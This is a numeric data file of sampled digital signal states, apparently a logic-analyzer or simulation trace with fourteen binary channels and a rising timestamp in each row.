1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911708e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911732e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911756e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911784e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911808e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911836e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911860e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911884e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911908e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911932e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4911956e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4911984e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912036e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912060e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912108e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912132e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912184e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912208e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912260e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912284e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912332e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912356e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912412e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912436e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912460e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912484e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912508e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912532e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912556e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912584e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912608e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912636e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912660e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912684e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912708e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912732e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912764e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912788e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912812e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912836e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912860e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912884e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912908e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912932e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4912960e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4912988e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913012e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913036e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913060e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913084e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913108e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913132e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913160e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913188e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913212e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913236e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913260e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913284e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913308e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913332e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913360e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913388e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913412e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913436e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913460e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913484e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913508e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913540e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913564e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913588e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,1.4913612e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,1.4913636e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,0,1.4913644e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,1,1.5037532e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,1.5037732e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.5037756e-02 0,1,0,0,0,1,0,0,0,1,0,1,0,1,1.5037788e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.5037812e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.5038100e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.5038124e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.5038148e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.5038172e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.5038196e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.5038220e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.5038244e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.5038268e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,1.5038292e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,1.5038316e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038368e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5038372e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038396e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5038400e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5038420e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5038444e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,1.5038448e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038452e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5038492e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038520e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5038548e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038568e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5038596e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038620e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5038644e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038668e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5038692e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038716e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5038744e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038768e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,1.5038772e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5038776e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5038796e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5038820e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5038868e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5038892e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038900e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5038920e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038944e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5038968e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5038996e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5039020e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5039044e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5039068e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5039092e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5039100e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5039148e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5039172e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5039196e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5039220e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5039224e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5039244e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5039268e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5039292e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5039324e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5039348e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5039372e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5039396e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5039420e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5039444e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5039472e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5039524e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5039548e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5039556e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5039572e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5039596e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5039620e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5039644e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5039672e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5039696e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5039724e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5039748e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5039772e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5039796e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5039820e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5039844e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5039872e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5039896e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5039924e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,1.5039948e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5039952e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5039972e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5039996e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5040048e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5040072e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5040096e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5040124e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5040148e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5040172e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5040196e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5040220e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040228e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040272e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040296e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040324e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040348e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040372e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040396e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040420e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040444e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040472e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040496e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040548e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040572e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5040576e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5040620e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5040644e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040652e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040672e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040696e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040724e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040748e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040772e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040796e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040820e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040844e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040872e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040896e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040924e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040948e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5040972e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5040996e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041020e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041044e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041072e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041096e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041124e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041148e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041172e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041196e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041220e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041244e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041272e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041296e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041324e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041348e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041372e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041396e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041420e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041444e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5041452e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5041500e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5041524e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,1.5041528e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041532e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041548e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041572e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041596e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041620e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041644e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041672e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041696e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041724e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041748e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041772e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041796e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041820e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041844e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5041872e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5041896e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5041924e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5041948e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5041972e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5042020e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5042044e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042052e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042072e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042096e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042124e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042148e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042172e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042196e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042220e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042244e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5042252e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5042272e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5042296e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5042324e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5042348e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5042396e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5042420e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5042444e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5042472e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5042496e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5042524e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042528e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042548e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042572e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042596e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042620e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042644e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042672e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042696e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042724e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042748e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042772e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042796e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042820e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042844e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5042872e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5042896e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5042924e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5042972e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5042996e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043004e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043020e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043044e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043072e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043096e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043124e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043148e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043172e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043196e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043220e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043244e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043272e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043296e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5043300e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5043324e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5043348e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5043372e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5043396e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5043420e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5043444e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5043472e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5043496e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5043524e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5043548e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5043596e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5043620e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043628e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043644e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043672e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043696e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043724e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043748e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043772e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043796e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043820e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043844e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043872e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043896e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043924e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043948e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5043972e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5043996e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044020e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044044e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044072e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044096e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044124e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044148e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044172e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044196e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044220e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044244e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044272e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044296e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044324e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044348e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044372e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044396e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044420e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044444e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044472e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044496e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044524e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044548e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044572e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044596e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044620e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044644e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044672e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044696e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044724e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044748e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044776e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5044804e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5044828e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,1,1.5169436e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.5169676e-02 1,1,0,0,0,0,0,0,0,0,0,1,0,1,1.5169708e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.5169732e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.5170024e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.5170052e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.5170076e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.5170100e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.5170124e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.5170148e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.5170172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,1.5170200e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,1.5170252e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170272e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170276e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5170280e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5170300e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5170324e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170332e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170348e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170372e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5170380e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5170424e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5170452e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,1.5170456e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170460e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170476e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170496e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170524e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170548e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170572e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170596e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170620e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170648e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170672e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170696e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170724e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,1.5170748e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5170752e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,1.5170796e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,1.5170820e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170828e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170844e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170872e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170896e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170924e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,1.5170948e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,1.5170972e-02 